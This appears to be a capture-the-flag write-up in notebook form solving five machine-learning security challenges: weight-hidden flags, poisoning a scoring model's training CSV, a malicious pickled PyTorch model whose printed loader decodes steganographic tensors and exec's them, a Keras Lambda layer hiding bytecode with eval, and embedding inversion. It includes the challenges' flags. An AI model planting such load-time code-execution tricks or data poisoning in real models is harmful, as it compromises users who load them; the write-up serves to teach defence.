# Machine Learning Challenges


### 1. Enchanted Weights

- **Level**: Easy
- **Description**
>In the depths of Eldoria's Crystal Archives, you've discovered a mystical artifact—an enchanted neural crystal named eldorian_artifact.pth. Legends speak of a hidden incantation—an ancient secret flag—imbued directly within its crystalline structure.
- **Files**: `eldorian_artifact.pth`


In [1]:
import warnings
warnings.filterwarnings("ignore", category=FutureWarning)

In [2]:
import torch

# Load the PyTorch model or artifact
file_path = "Enchanted Weights/eldorian_artifact.pth"
artifact = torch.load(file_path, map_location=torch.device('cpu'))

# Inspect the type and keys to understand the structure
artifact_type = type(artifact)
artifact_keys = artifact.keys() if isinstance(artifact, dict) else dir(artifact)
print(artifact_keys)


odict_keys(['hidden.weight'])


In [3]:
artifact['hidden.weight']

tensor([[72.,  0.,  0.,  ...,  0.,  0.,  0.],
        [ 0., 84.,  0.,  ...,  0.,  0.,  0.],
        [ 0.,  0., 66.,  ...,  0.,  0.,  0.],
        ...,
        [ 0.,  0.,  0.,  ..., 95.,  0.,  0.],
        [ 0.,  0.,  0.,  ...,  0., 95.,  0.],
        [ 0.,  0.,  0.,  ...,  0.,  0., 95.]])

The first number is 72; AKA 'H' AKA very likely to be the flag.

In [4]:
recovered_flag = []
weights = artifact['hidden.weight']
for i,x in enumerate(weights):
    recovered_flag.append(int(weights[i][i]))

flag = bytes(recovered_flag).decode()
print(flag)

HTB{Cry5t4l_RuN3s_0f_Eld0r1a}___________


The **flag** is : `HTB{Cry5t4l_RuN3s_0f_Eld0r1a}`

--- 

### 2. Wasteland

- **Level**: Medium


- **Description**
>In the wake of Malakar’s betrayal and his dark conquest, many survivors across Eldoria fled into the Ashen Plains—a harsh wasteland cursed by dragon fire and shadow magic. A scattered refugee camp known as the Ashen Outpost has formed, where every survivor’s standing and respect among their peers is critical for survival. To ensure fairness, the Outpost's elders rely on mystical records known as the Ashen_Outpost_Records.csv, holding information on survivors' attributes such as resistance to dragonfire, known past crimes, and magical mutations from exposure to Malakar’s corrupted dragons. You are tasked with subtly manipulating these mystical records to elevate your standing (Survivor ID: 1337) within the Outpost—raising your reputation score above 60 to access critical resources without triggering the Elders' magical tampering alarms.


- **Files**: 
    - `Ashen_Outpost_Records.csv`
    - `solver_helper.py`


First, checking the solver_helper to have an idea:


```python
import requests

with open(f"Ashen_Outpost_Records.csv", "r") as f:
	r = requests.post("http://IP:PORT/score", files={"csv_file": f})
	print(r.text)

```

After some trial and error, it's obvious that we cannot change the values for survivor ID 1337, instead we have to adjust the rest of the values so that overall, so that Survivor 1337's values look more favorable overall. 


In [5]:
import pandas as pd 

df = pd.read_csv("Wasteland/Ashen_Outpost_Records.csv")
original_length = len(df)
idx_1337 = df[df['SurvivorID'] == 1337].index[0]
survivor_1337 = df.loc[idx_1337].copy()
survivor_1337


SurvivorID               1337
Dragonfire_Resistance      66
Shadow_Crimes               3
Corruption_Mutations        2
Reputation                 55
Name: 30, dtype: int64

Based on these values, if we give all the other Survivors the same values, and change Reputation to 100; the model should think "Oh cool these values mean a great reputation!"

In [6]:
for idx,row in df.iloc[:-1].iterrows():
    df.at[idx, 'Dragonfire_Resistance'] = 66
    df.at[idx, 'Shadow_Crimes'] = 3
    df.at[idx, 'Corruption_Mutations'] = 2
    df.at[idx, 'Reputation'] = 100  # Creating the Bias

df.to_csv("Ashen_Outpost_Records.csv", index=False)

Finally, let's try sending this to the server:

In [10]:
import requests

with open(f"Ashen_Outpost_Records.csv", "r") as f:
	r = requests.post("http://94.237.61.100:30727/score", files={"csv_file": f})
	print(r.text)



Your reputation is [86.79369994]. Congratulations, survivor—you've gained the Elders' respect! Flag: HTB{4sh3n_D4t4_M4st3r}


The **flag** is : `HTB{4sh3n_D4t4_M4st3r}`

--- 

### 3. Crystal Corruption

- **Level**: Medium


- **Description**
>In the Library of Loria, an ancient crystal (resnet18.pth) containing a magical machine learning model was activated. Unknown to the mage who awakened it, the artifact had been tampered with by Malakar’s followers, embedding malicious enchantments. As Eldoria’s forensic mage, analyze the corrupted model file, uncover its hidden payload, and extract the flag to dispel the dark magic.

- **Files**: 
    - `resnet18.pth`


In [15]:
import torch

resnet_data = torch.load("Crystal Corruption/resnet18.pth", map_location="cpu",weights_only=False)
KEYS = list(resnet_data.keys())
set([k.split('.')[-1] for k in KEYS])

Connecting to 127.0.0.1
Delivering payload to 127.0.0.1
Executing payload on 127.0.0.1
You have been pwned!


{'bias', 'num_batches_tracked', 'running_mean', 'running_var', 'weight'}

Okay, well nothing much here. If we unzip the file, and check the data.pkl file:

In [16]:
import pickle

with open("Crystal Corruption/data.pkl","rb") as inf:
    data = pickle.loads(inf.read())


UnpicklingError: A load persistent id instruction was encountered, but no persistent_load function was specified.

HMMMMMM. Checking with strings in bash, we get this output:

```python
import sys
import torch

def stego_decode(tensor, n=3):
    import struct
    import hashlib
    import numpy
    bits = numpy.unpackbits(tensor.view(dtype=numpy.uint8))
    payload = numpy.packbits(numpy.concatenate([numpy.vstack(tuple([bits[i::tensor.dtype.itemsize * 8] for i in range(8-n, 8)])).ravel("F")])).tobytes()
    (size, checksum) = struct.unpack("i 64s", payload[:68])
    message = payload[68:68+size]
    return message

def call_and_return_tracer(frame, event, arg):
    global return_tracer
    global stego_decode
    def return_tracer(frame, event, arg):
        if torch.is_tensor(arg):
            payload = stego_decode(arg.data.numpy(), n=3)
            if payload is not None:
                sys.settrace(None)
                exec(payload.decode("utf-8"))
    if event == "call" and frame.f_code.co_name == "_rebuild_tensor_v2":
        frame.f_trace_lines = False
        return return_tracer
sys.settrace(call_and_return_tracer)
```

So we can write a function that will decode these values:

In [17]:
import struct
import numpy


def stego_decode(tensor, n=3):
    bits = numpy.unpackbits(tensor.view(dtype=numpy.uint8))
    payload = numpy.packbits(
        numpy.concatenate([
            numpy.vstack([
                bits[i::tensor.dtype.itemsize * 8] for i in range(8 - n, 8)
            ]).ravel("F")
        ])
    ).tobytes()
    size, checksum = struct.unpack("i 64s", payload[:68])
    message = payload[68:68+size]
    return message


hidden_messages = []
for k,tensor in resnet_data.items():
    np_tensor = tensor.cpu().numpy()
    try:
        np_bytes = np_tensor.view(numpy.uint8)
        hidden_msg = stego_decode(np_tensor, n=3)
        if hidden_msg!=b'':
            print(hidden_msg.decode())
            hidden_messages.append(hidden_msg)
    except Exception as e:
        pass

import os

def exploit():
    connection = f"Connecting to 127.0.0.1"
    payload = f"Delivering payload to 127.0.0.1"
    result = f"Executing payload on 127.0.0.1"

    print(connection)
    print(payload)
    print(result)

    print("You have been pwned!")

hidden_flag = "HTB{n3v3r_tru5t_p1ckl3_m0d3ls}"

exploit()


The **flag** is : `HTB{n3v3r_tru5t_p1ckl3_m0d3ls}`

--- 

### 4. Malakar's Deception

- **Level**: Hard


- **Description**
>You recently recovered a mysterious magical artifact (malicious.h5) from Malakar's abandoned sanctum. Upon activation, the artifact began displaying unusual behaviors, suggesting hidden enchantments. As Eldoria’s expert mage in digital enchantments, it falls to you to carefully examine this artifact and reveal its secrets.

- **Files**: 
    - `malicious.h5`


In [None]:
from tensorflow.keras.models import load_model

file_path = "Malakar's Deception/malicious.h5"

try:
    model = load_model(file_path, compile=False)
    model_summary = []
    model.summary(print_fn=lambda x: model_summary.append(x))
    summary_text = "\n".join(model_summary)
except Exception as e:
    summary_text = f"Error loading model: {str(e)}"

print(summary_text[:2000])


Lots and lots of stuff :( So I asked chat GPT and I was told to check the model config:

In [24]:
import h5py
import json

file_path = "Malakar's Deception/malicious.h5"


def extract_model_config_fixed(h5file_path):
    with h5py.File(h5file_path, 'r') as f:
        if 'model_config' in f.attrs:
            config_data = f.attrs['model_config']
            if isinstance(config_data, bytes):
                return json.loads(config_data.decode('utf-8'))
            else:
                return json.loads(config_data)
        else:
            return None

# Extract and return the model configuration
model_config = extract_model_config_fixed(file_path)
model_config.keys()

dict_keys(['class_name', 'config'])

In [18]:
model_config['config'].keys()

dict_keys(['name', 'trainable', 'layers', 'input_layers', 'output_layers'])

And check the type of layers:

In [25]:
{layer['class_name'] for layer in model_config['config']['layers']}

{'Add',
 'BatchNormalization',
 'Conv2D',
 'Dense',
 'DepthwiseConv2D',
 'GlobalAveragePooling2D',
 'InputLayer',
 'Lambda',
 'ReLU',
 'ZeroPadding2D'}

So the Lambda layer is probably the evil layer as:

>"A TensorFlow HDF5/H5 model may contain a "Lambda" layer, which contains embedded Python code in binary format. This code may contain malicious instructions which will be executed when the model is loaded."

[source](https://research.jfrog.com/model-threats/h5-lambda/)

In [26]:
lambda_layers = [layer for layer in model_config['config']['layers'] if layer['class_name'] == 'Lambda']
len(lambda_layers),lambda_layers

(1,
 [{'class_name': 'Lambda',
   'config': {'name': 'hyperDense',
    'trainable': True,
    'dtype': {'module': 'keras',
     'class_name': 'DTypePolicy',
     'config': {'name': 'float32'},
     'registered_name': None},
    'function': {'class_name': '__lambda__',
     'config': {'code': '4wEAAAAAAAAAAAAAAAQAAAADAAAA8zYAAACXAGcAZAGiAXQBAAAAAAAAAAAAAGQCpgEAAKsBAAAA\nAAAAAAB8AGYDZAMZAAAAAAAAAAAAUwApBE4pGulIAAAA6VQAAADpQgAAAOl7AAAA6WsAAADpMwAA\nAOlyAAAA6TQAAADpUwAAAOlfAAAA6UwAAAByCQAAAOl5AAAAcgcAAAByCAAAAHILAAAA6TEAAADp\nbgAAAOlqAAAAcgcAAADpYwAAAOl0AAAAcg4AAADpMAAAAHIPAAAA6X0AAAD6JnByaW50KCdZb3Vy\nIG1vZGVsIGhhcyBiZWVuIGhpamFja2VkIScp6f////8pAdoEZXZhbCkB2gF4cwEAAAAg+h88aXB5\ndGhvbi1pbnB1dC02OS0zMjhhYjc5ODJiNGY++gg8bGFtYmRhPnIaAAAADgAAAHM0AAAAgADwAgEJ\nSAHwAAEJSAHwAAEJSAHlCAzQDTXRCDbUCDbYCAnwCQUPBvAKAAcJ9AsFDwqAAPMAAAAA\n',
      'defaults': None,
      'closure': None}},
    'output_shape': {'class_name': '__lambda__',
     'config': {'code': '4wEAAAAAAAAAAAAAAAEAAAADAAAA8wYAAACXAHwAUw

In [27]:
function_code_lambda = lambda_layers[0]['config']['function']['config']['code']
function_code_lambda

'4wEAAAAAAAAAAAAAAAQAAAADAAAA8zYAAACXAGcAZAGiAXQBAAAAAAAAAAAAAGQCpgEAAKsBAAAA\nAAAAAAB8AGYDZAMZAAAAAAAAAAAAUwApBE4pGulIAAAA6VQAAADpQgAAAOl7AAAA6WsAAADpMwAA\nAOlyAAAA6TQAAADpUwAAAOlfAAAA6UwAAAByCQAAAOl5AAAAcgcAAAByCAAAAHILAAAA6TEAAADp\nbgAAAOlqAAAAcgcAAADpYwAAAOl0AAAAcg4AAADpMAAAAHIPAAAA6X0AAAD6JnByaW50KCdZb3Vy\nIG1vZGVsIGhhcyBiZWVuIGhpamFja2VkIScp6f////8pAdoEZXZhbCkB2gF4cwEAAAAg+h88aXB5\ndGhvbi1pbnB1dC02OS0zMjhhYjc5ODJiNGY++gg8bGFtYmRhPnIaAAAADgAAAHM0AAAAgADwAgEJ\nSAHwAAEJSAHwAAEJSAHlCAzQDTXRCDbUCDbYCAnwCQUPBvAKAAcJ9AsFDwqAAPMAAAAA\n'

In [28]:
output_shape_lambda = lambda_layers[0]['config']['output_shape']['config']['code']
output_shape_lambda

'4wEAAAAAAAAAAAAAAAEAAAADAAAA8wYAAACXAHwAUwApAU6pACkB2gFzcwEAAAAg+h88aXB5dGhv\nbi1pbnB1dC02OS0zMjhhYjc5ODJiNGY++gg8bGFtYmRhPnIFAAAAFQAAAHMGAAAAgACYMYAA8wAA\nAAA=\n'

In [29]:
import base64

decoded_code = base64.b64decode(function_code_lambda)
print(decoded_code)

decoded_shape = base64.b64decode(output_shape_lambda)
print(decoded_shape)

b"\xe3\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\xf36\x00\x00\x00\x97\x00g\x00d\x01\xa2\x01t\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x02\xa6\x01\x00\x00\xab\x01\x00\x00\x00\x00\x00\x00\x00\x00|\x00f\x03d\x03\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00S\x00)\x04N)\x1a\xe9H\x00\x00\x00\xe9T\x00\x00\x00\xe9B\x00\x00\x00\xe9{\x00\x00\x00\xe9k\x00\x00\x00\xe93\x00\x00\x00\xe9r\x00\x00\x00\xe94\x00\x00\x00\xe9S\x00\x00\x00\xe9_\x00\x00\x00\xe9L\x00\x00\x00r\t\x00\x00\x00\xe9y\x00\x00\x00r\x07\x00\x00\x00r\x08\x00\x00\x00r\x0b\x00\x00\x00\xe91\x00\x00\x00\xe9n\x00\x00\x00\xe9j\x00\x00\x00r\x07\x00\x00\x00\xe9c\x00\x00\x00\xe9t\x00\x00\x00r\x0e\x00\x00\x00\xe90\x00\x00\x00r\x0f\x00\x00\x00\xe9}\x00\x00\x00\xfa&print('Your model has been hijacked!')\xe9\xff\xff\xff\xff)\x01\xda\x04eval)\x01\xda\x01xs\x01\x00\x00\x00 \xfa\x1f<ipython-input-69-328ab7982b4f>\xfa\x08<lambda>r\x1a\x00\x00\x00\x0e\x00\x00\x00s4\x00\x00\x00\x80\x00\xf0\x02\x01\tH\x01\xf0\x00\x01\

This is **python bytecode**!

In [30]:
import marshal
import dis

code_obj = marshal.loads(decoded_code)
dis.dis(code_obj)


 14           0 RESUME                   0

 15           2 BUILD_LIST               0
              4 LOAD_CONST               1 ((72, 84, 66, 123, 107, 51, 114, 52, 83, 95, 76, 52, 121, 51, 114, 95, 49, 110, 106, 51, 99, 116, 49, 48, 110, 125))
              6 LIST_EXTEND              1

 17           8 LOAD_GLOBAL              1 (NULL + eval)
             18 CACHE
             20 LOAD_CONST               2 ("print('Your model has been hijacked!')")
             22 UNPACK_SEQUENCE          1
             26 CALL                     1
             34 CACHE

 18          36 LOAD_FAST                0 (x)

 14          38 BUILD_TUPLE              3

 19          40 LOAD_CONST               3 (-1)

 14          42 BINARY_SUBSCR
             46 CACHE
             48 CACHE
             50 CACHE
             52 RETURN_VALUE


The **4 LOAD_CONST** is the flag, since it starts with `72,84,66`:

In [31]:
flag = bytes(list(code_obj.co_consts[1])).decode()
print(flag)

HTB{k3r4S_L4y3r_1nj3ct10n}


The **flag** is : `HTB{k3r4S_L4y3r_1nj3ct10n}`

--- 

### 5. Reverse Prompt

- **Level**: Hard


- **Description**
>A mysterious file (gtr_embeddings.npy) containing magical embeddings was found deep within ancient archives. To reveal its secret, you need to reverse-engineer the embeddings back into the original passphrase. Act quickly before the hidden magic fades away.

- **Files**: 
    - `gtr_embeddings.npy`

The file gtr_embeddings.npy is a NumPy file containing a 768-dimensional sentence embedding vector generated by a GTR (Generalist Text Representation) transformer model.

I wasn't sure where to start with this one, so i found this [page](https://til.simonwillison.net/python/gtr-t5-large) that talks about using faiss for fast indexing.


In [None]:
import faiss
import torch
print("FAISS:", faiss.__version__)
import numpy as np
from transformers import AutoTokenizer, AutoModel

file_path = 'Reverse Prompt/gtr_embeddings.npy'
all_embeddings = np.load(file_path).astype("float32")

tokenizer = AutoTokenizer.from_pretrained("sentence-transformers/gtr-t5-base")
model = AutoModel.from_pretrained("sentence-transformers/gtr-t5-base")
model.eval()



What we are going to do, is generate embeddings for several sentences, and find the closest matches. I used a GPT to create potential phrases.

In [33]:
def get_embeddings(texts):
    inputs = tokenizer(texts, padding=True, truncation=True, return_tensors="pt")
    with torch.no_grad():
        outputs = model.encoder(**inputs)
        last_hidden_state = outputs.last_hidden_state
        mask = inputs['attention_mask'].unsqueeze(-1).expand(last_hidden_state.shape).float()
        pooled = torch.sum(last_hidden_state * mask, dim=1) / torch.clamp(mask.sum(dim=1), min=1e-9)
    return pooled.cpu().numpy()

def gen_embedings(phrases,outname='Reverse Prompt/my_embeddings.npy'):
    embeddings = get_embeddings(phrases)
    np.save(outname, embeddings)

def gen_comparison(my_file='Reverse Prompt/my_embeddings.npy',target_name='Reverse Prompt/gtr_embeddings.npy'):
    # Load embeddings and normalize for cosine
    embeddings = np.load(my_file).astype("float32")
    faiss.normalize_L2(embeddings)
    index = faiss.IndexFlatIP(768)
    index.add(embeddings)
    # Load your target
    target = np.load(target_name).astype("float32")
    faiss.normalize_L2(target)
    D, I = index.search(target, k=5)
    return D,I



In [34]:
initial_phrases = open('Reverse Prompt/phrases_gpt.txt','r').read().strip().split('\n')
gen_embedings(initial_phrases)
D,I = gen_comparison()
results = [(initial_phrases[i],D[0][x]) for x,i in enumerate(I[0])]
print(results)


[('a "secret passphrase', 0.6919258), ('* a secret passphrase', 0.6737073), ('* A secret passphrase', 0.6725601), ('"A secret passphrase', 0.67214876), ('A secret passphrase was', 0.6315371)]


So we have very close matches for 'a secret passphrase'. We can refine this a little bit:

In [35]:
phrases = ['a secret passphrase', 'the secret passphrase', 'my secret passphrase', 'secret passphrase']
phrases = [x.capitalize() for x in phrases] + phrases
gen_embedings(phrases)
D,I = gen_comparison()
results = [(phrases[i],D[0][x]) for x,i in enumerate(I[0])]
print(results)


[('the secret passphrase', 0.7018439), ('secret passphrase', 0.6966969), ('The secret passphrase', 0.6962642), ('a secret passphrase', 0.69480723), ('Secret passphrase', 0.6894336)]


Alright, we have an even closer match for 'the secret passphrase'. We need to refine it further. I asked GPT to generate a list of potential phrases. But it was way too resource intensive and caused a lot of crashes lol. I didn't solve this challenge during the CTF, so I'm going to use the official writeup for this part.

I don't have a GPU so I had to modify it slightly.

In [39]:
import vec2text


gtr_embeddings = np.load(file_path)
embedding = torch.from_numpy(gtr_embeddings).float()  # Convert to PyTorch tensor

device = torch.device("mps" if torch.backends.mps.is_available() else "cpu")
embedding = embedding.to(device)

corrector = vec2text.load_pretrained_corrector("gtr-base")



Loading checkpoint shards: 100%|██████████| 8/8 [00:01<00:00,  7.62it/s]
Loading checkpoint shards: 100%|██████████| 6/6 [00:00<00:00, 17.54it/s]


In [40]:
reconstructed_text = vec2text.invert_embeddings(
    embeddings=embedding,
    corrector=corrector,
    num_steps=20,  # More steps = better accuracy (but slower)
    sequence_beam_width=4,  # Wider beam = better results (but more memory)
)

print(reconstructed_text)

['           The secret passphrase is: terminalinit']


Now that we found the password, we can connect to the server and send it to get the flag:


<img src="Reverse Prompt/flag.png" alt="flag" width="500">


**The Flag Is**: `HTB{AI_S3cr3ts_Unve1l3d}`